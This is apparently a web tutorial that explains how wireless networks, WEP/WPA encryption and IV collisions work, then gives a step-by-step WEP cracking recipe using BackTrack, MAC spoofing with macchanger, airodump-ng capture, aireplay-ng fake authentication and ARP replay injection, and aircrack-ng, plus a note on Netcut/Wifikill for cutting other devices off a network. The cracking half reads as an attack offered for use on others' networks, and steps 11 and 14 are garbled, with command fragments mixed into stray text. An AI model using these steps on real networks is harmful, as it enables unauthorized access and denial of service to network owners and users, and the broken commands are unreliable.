How a wireless network works
A
wireless local area network (WLAN) is the linking of 2 or more
computers with Network Interface Cards (NICs) through a technology based
on radio waves. All devices that can connect to a wireless network are
known as stations. Stations can be access points (APs), or clients.
Access
points are base stations for the wireless network. They receive and
transmit information for the clients to communicate with. The set of all
stations that communicate with each other is referred to as the Basic
Service Set (BSS). Every BSS has an Identification known as a BSSID,
also known as the MAC address, which is a unique identifier that is
associated with every NIC. For any client to join a WLAN, it should
know the SSID of the WLAN; therefore, the access points typically
broadcast their SSID to let the clients know that an AP is in range.
Data streams, known as packets, are sent between the Access Point, and
it’s clients. You need no physical access to the network or its wires to
pick up these packets, just the right tools. It is with the
transmission of these packets that pose the largest security threat to
any wireless network.
Wireless Encryption
The majority of home and small business networks are encrypted using the two most popular methods:
- WEP & WPA
WEP
– Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128,
and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively. WEP
provides a casual level of security but is more compatible with older
devices; therefore, it is still used quite extensively. Each WEP key
contains a 24 bit Initialization Vector (IV), and a user-defined or
automatically generated key; for instance, WEP 128 is a combination of
the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)
WEP also comes in WEP2 and WEP+, which are not as common and still as vulnerable as the standard WEP encryption.
WPA
– WiFi Protected Access – comes in WPA and WPA2, and was created to
resolve several issues found in WEP. Both provide you with good
security; however, they are not compatible with older devices and
therefore not used as widely. WPA was designed to distribute different
keys to each client; however, it is still widely used in a (not as
secure) pre-shared key (PSK) mode, in which every client has the same
passphrase.
To fully
utilize WPA, a user would need an 802.1x authentication server, which
small businesses and typical home users simply cannot afford. WPA
utilizes a 48 bit Initialization Vector (IV), twice the size of WEP,
which combined with other WEP fixes, allows substantially greater
security over WEP.
Packets and IVs
It’s
all in the packets. The bottom line is – while you may be able to
employ several security features on your WLAN – anything you broadcast
over the air can be intercepted, and could be used to compromise the
security on your network. If that frightens you, start stringing wires
throughout your home.
Every
encrypted packet contains a 24 or 48 bit IV, depending on the type of
encryption used. Since the pre-shared key is static and could be
easily obtained, the purpose of the IV is to encrypt each packet with a
different key. For example, to avoid a duplicate encryption key in every
packet sent, the IV is constantly changing. The IV must be known to
the client that received the encrypted packet in order to decrypt it;
therefore, it is sent in plaintext.
The
problem with this method is that the Initialization Vectors are not
always the same. In theory, if every IV was different, it would be
nearly impossible to obtain the network key; this is not the case. WEP
comes with a 24 bit IV; therefore, giving the encryption 16 million
unique values that can be used. This may sound like a large number, but
when it comes to busy network traffic, it’s not.
Every
IV is not different; and this is where the issues arise. Network
hackers know that all the keys used to encrypt packets are related by a
known IV (since the user entered WEP part of the key is rarely changed);
therefore, the only change in the key is 24 bits. Since the IV is
randomly chosen, there is a 50% probability that the same IV will repeat
after just 5,000 packets; this is known as a collision.
If
a hacker knows the content of one packet, he can use the collision to
view the contents of the other packet. If enough packets are collected
with IV matches, your network’s security can be compromised.
The crack
Two
of the most popular programs used for actually cracking the WEP key are
Airsnort and Aircrack. Airsnort can be used with the .dump files that
Kismet provides; and Aircrack can be used with the .cap files that
Airodump provides.
Airsnort
can be used on it’s own without any other software capturing packets;
although, it has been reported to be extremely unstable in this state,
and you should probably not chance loosing all your captured data. A
better method would be to let Airsnort recover the encryption key from
your Kismet .dump file. Kismet and Airsnort can run simultaneously.
For
this demonstration, we’ll be using Aircrack. You can use Airodump to
capture the packets, and Aircrack to crack the encryption key at the
same time.
With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap
The -f switch
followed by a number is the fudgefactor; which is a variable that the
program uses to define how thoroughly it scans the .cap file. A
larger number will give you a better chance of finding the key, but will
usually take longer. The default is 2.
The -n switch
followed by 64 represents that you are trying to crack a WEP 64 key. I
knew because it was a setup; In the real world there is no way to
determine what WEP key length a target access point is using. You may
have to try both 64 and 128.
The -q 3 switch
was used to display the progress of the software. It can be left out
altogether to provide a faster crack; although, if you’ve obtained
enough unique IVs, you should not be waiting more than a couple minutes.
A -m switch
can be used, followed by a MAC address, to filter a
specific AP’s usable packets; this would come in handy if you were
collecting packets from multiple APs in Airodump.
Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.
The
same experiment was repeated with WEP 128 and it took about 43 minutes.
The reason it was not substantially longer is because I simply let
Airplay replay more packets. Sometimes you can get lucky and capture an
ARP Request packet within a few minutes; otherwise, it could take a
couple hours.
Netcut:
Disconnect
any wifi devices from network. Support windows OS . The driver and
Install package has been upgrade. tested working under windows 7 both 32
bit and 64 bit OS. Its change MAC address on any adapter, including
wireless. Details at How to change MAC. Also support Clone MAC address
from any PC that NetCut monitored.
Whereas Wifikill use for
Android applications to disable internet connections for a device on
same network. Disconnect wifi connection and get full network on your
device.
Step 1:-
First Download Backtrack from the following link:
Step 2:-
Burn the iso image on CD and boot your laptop from CD drive
Step 3:-
Select the third boot option(VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to
load up a
"Konsole" window.
Step 5:-
Type the following command
airmon-ng
Note down the interface name. In this example wifi0
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with
STATION associated with it,
means you some one is accessing that network and our task will be
little easier.
If not than don’t worry we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
--bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful mesage then keep on trying until
you got success.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing
or still 0
than it means no 1 is
accessing that network.But don’t worry you go an optional step,
Leave this console as it is and start new k
Step 14:-
aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success
got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.
Done..!!
